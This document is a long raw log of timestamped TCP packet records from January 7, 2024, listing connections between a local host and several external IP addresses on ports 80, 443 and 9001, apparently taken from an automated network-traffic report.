                                                                                                                                                                    Jan 7, 2024 05:29:59.360361099 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.360400915 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.360709906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.360769987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.360783100 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.360805035 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.360819101 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.360843897 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.450118065 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.450160980 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.450205088 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.450323105 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.497332096 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.554971933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.555017948 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.555079937 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.555712938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.556049109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.556096077 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.556202888 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.556297064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.556343079 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.556379080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.556469917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.556535959 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.556591034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.556659937 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.556710005 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.556870937 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.557096004 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.557152987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.557169914 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.557579994 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.557617903 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.557673931 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.557789087 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.557888031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.557928085 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.557975054 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.557996035 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.558022022 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.558046103 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.558085918 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.558144093 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.558233976 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.558255911 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.558295012 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.558339119 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.558382034 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.558425903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.606712103 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.645438910 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.645512104 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.645616055 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.691819906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.691838026 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.691895962 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.705529928 CET44349765172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.705641031 CET44349765172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.705729961 CET49765443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:59.714029074 CET49765443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:59.714059114 CET44349765172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.749515057 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.749552011 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.749615908 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.749794960 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.749892950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.750094891 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.750168085 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.750185013 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.750230074 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.750267029 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.750356913 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.750683069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.750734091 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.750797987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.750843048 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.750940084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.751045942 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.751774073 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.751828909 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.751871109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.751913071 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.751995087 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.752010107 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.752047062 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.752095938 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.752542019 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.752593040 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.752661943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.752846956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.752938032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.752976894 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.753016949 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.753055096 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.753092051 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.753186941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.753453016 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.801193953 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.801378012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.801469088 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.840454102 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.840517998 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.840579033 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.885699987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.885796070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.885888100 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.944884062 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.945017099 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.945087910 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.945420980 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.945533991 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.946120024 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.946161032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.946270943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.946345091 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.946365118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.946427107 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.946609020 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.946659088 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.946764946 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.946809053 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.947218895 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.947313070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.947357893 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.947431087 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.947506905 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.947537899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.947581053 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.947590113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.947632074 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.948060036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.948158979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.948210001 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.948255062 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.948318958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.948362112 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.948390007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.948421001 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.948869944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.948911905 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.948961973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.949002028 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:59.996814966 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.996872902 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:59.996983051 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:30:00.035789967 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:00.091075897 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:30:00.265594006 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:30:00.265642881 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:30:00.460190058 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:00.476377010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:00.528599977 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:30:00.749524117 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:30:00.749555111 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:30:00.943798065 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:00.960870028 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:01.012999058 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:30:01.966239929 CET497559001192.168.2.488.198.112.25
                                                                                                                                                                    Jan 7, 2024 05:30:03.313092947 CET49769443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:03.313142061 CET44349769172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:03.313206911 CET49769443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:03.320750952 CET49769443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:03.320765972 CET44349769172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:03.506999969 CET44349769172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:03.507076979 CET49769443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:03.543755054 CET49769443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:03.543773890 CET44349769172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:03.544176102 CET44349769172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:03.546521902 CET49769443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:03.546679974 CET49769443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:03.546705961 CET44349769172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:03.936408997 CET44349769172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:03.936511993 CET44349769172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:03.936562061 CET49769443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:03.940581083 CET49769443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:03.940601110 CET44349769172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:03.991043091 CET49770443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:03.991091013 CET44349770172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:03.991161108 CET49770443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:03.991923094 CET49770443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:03.991935015 CET44349770172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:04.177328110 CET44349770172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:04.177393913 CET49770443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:04.181237936 CET49770443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:04.181253910 CET44349770172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:04.181508064 CET44349770172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:04.182812929 CET49770443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:04.182957888 CET49770443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:04.182964087 CET44349770172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:04.582590103 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:04.612350941 CET44349770172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:04.612457037 CET44349770172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:04.612504005 CET49770443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:04.629182100 CET49770443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:04.629205942 CET44349770172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:04.852241039 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:04.852380991 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:04.854701042 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.175225019 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.175288916 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.175335884 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.405513048 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.405605078 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.405670881 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.405706882 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.405827999 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.405868053 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.579071045 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.579111099 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.579176903 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.579741001 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.579760075 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.636045933 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.636105061 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.636177063 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.636230946 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.637690067 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.637732029 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.637757063 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.637839079 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.637871981 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.637897968 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.637970924 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.638089895 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.767793894 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.767873049 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.774506092 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.774522066 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.774815083 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.776026964 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.776906967 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.776937008 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.777024984 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.777053118 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.777178049 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.777239084 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.777394056 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.777415037 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.777748108 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.777770996 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.777890921 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.777908087 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.777920961 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.777930021 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.778038979 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.778059959 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.778074980 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.778217077 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.778234005 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.820744038 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.820955992 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.820987940 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.821007013 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.821018934 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.821038008 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.821049929 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.821078062 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:05.821084976 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.860958099 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.862050056 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.862088919 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.862103939 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.862152100 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.862186909 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.864490986 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.864504099 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.864556074 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.866705894 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.866789103 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.866843939 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.866844893 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.868964911 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.868984938 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.869010925 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.870534897 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.870573044 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.870652914 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.870692015 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.870763063 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:05.872430086 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.872443914 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:05.872488022 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:06.088071108 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:06.088113070 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:06.088186979 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:06.090452909 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:06.090466022 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:06.090539932 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:06.090549946 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:06.092075109 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:06.092147112 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:06.092206001 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:06.092225075 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:06.095773935 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:06.100312948 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:06.100332022 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:06.100387096 CET4977180192.168.2.491.104.83.7
